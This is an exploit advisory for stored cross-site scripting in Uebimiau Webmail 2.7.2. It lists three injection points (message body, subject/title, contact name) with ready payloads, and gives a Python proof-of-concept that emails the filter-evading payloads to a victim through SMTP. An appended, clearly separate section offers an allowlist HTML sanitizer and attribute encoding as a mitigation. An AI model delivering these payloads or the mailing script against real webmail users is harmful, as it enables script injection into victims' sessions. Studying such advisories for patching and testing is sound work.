Uebimiau Webmail stored XSS

2012.08.20
Credit: Shai rod
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#!/usr/bin/python

'''
# Exploit Title: Uebimiau Webmail Stored XSS
# Date: 17/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://www.uebimiau.org/
# Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
# Version: 2.7.2

#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar

About the Application:
======================

Uebimiau is a universal webmail developed in PHP by Aldoir Ventura. It is free and can be installed in any email server.

-It runs under any System;
-It doesn't require any extra PHP modules;
-Doesn't need a database (as MySQL, PostgreSQL, etc.)
-Doesn't need IMAP, but compatible with POP3 and IMAP
-Compatible with the MIME Standard (send/receive text/html emails);
-Doesn't need cookies;
-Easy installation. You only modify one file;
-Compatible with Apache, PHP, Sendmail or QMAIL;
-Can be easily translated into any language (already translated in 17 languages);
-Can use a variety of skins

Vulnerability Description
=========================

1. Stored XSS in e-mail body.

XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>

Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.

2. Stored XSS in "Title" field (works when victim opens message in full view).

XSS Payload: SubjectGoesHere"><img src='1.jpg'onerror=javascript:alert("XSS")>

This one requires you to send at least 2 messages to the victim with the payload in the email subject.

Location of injection in page source:

<a class="menu" href="readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" title="Uebimiau Webmail Stored XSS POC "><img src='1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: <a class="menu" href="javascript:goback()">Back</a> ::

3. Stored XSS in Address Book

XSS Payload: <script>alert("XSS")</script>

Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.

'''

import smtplib

print "###############################################"
print "# Uebimiau Webmail Stored XSS POC #"
print "# Coded by: Shai rod #"
print "# @NightRang3r #"
print "# http://exploit.co.il #"
print "# For Educational Purposes Only! #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "10.0.0.5"
smtp_port = 25
subject = "Uebimiau Webmail Stored XSS POC"
xss_payload_1 = """ "><img src='1.jpg'onerror=javascript:alert("XSS")>"""
xss_payload_2 = """<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""

# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
       % (sender, recipient, subject + xss_payload_1))
msg += "Content-type: text/html\n\n"
msg += """Nothing to see here...\r\n"""
msg += xss_payload_2
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
print "[*] Sending Message 1\r"
server.sendmail(sender, recipient, msg)
print "[*] Sending Message 2\r"
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"
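
Mitigation sketch for the three injection points described above, added here as an example and not taken from the advisory or from Uebimiau's code: the message body is rebuilt from parser events against an allowlist instead of having strings stripped out of it, and the subject and contact name are entity-encoded before being written into a quoted attribute such as title="..." or into page text. The tag and attribute allowlist and all function names are assumptions.

```python
# Added example: allowlist sanitizer plus attribute encoding (not Uebimiau code).
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "br", "em", "i", "li", "ol", "p", "strong", "ul"}  # assumed policy
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class AllowlistSanitizer(HTMLParser):
    """Rebuilds markup from parser events; unknown tags are dropped, text is escaped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops every on* handler and style attribute
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue  # drops javascript: and other non-allowlisted schemes
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize_body(markup):
    """Return message-body HTML reduced to the allowlist above."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)

def encode_attr(text):
    """Encode untrusted text (subject, contact name) for a quoted attribute or text node."""
    return html.escape(text, quote=True)

# Payload strings as quoted in the advisory, used here only as test input.
BODY = r"""<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""
SUBJECT = """SubjectGoesHere"><img src='1.jpg'onerror=javascript:alert("XSS")>"""
CONTACT = '<script>alert("XSS")</script>'
# Constructed input mixing allowed markup with a handler attribute.
MIXED = '<p>See <a href="https://example.test/" onclick="x()">this</a></p>'
```

Because output is generated only from allowlisted parser events, nested or malformed tag names never reach the page as markup; unbalanced closing tags can still affect layout and would need a balancing pass in production use.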

References:

http://www.uebimiau.org/
http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip

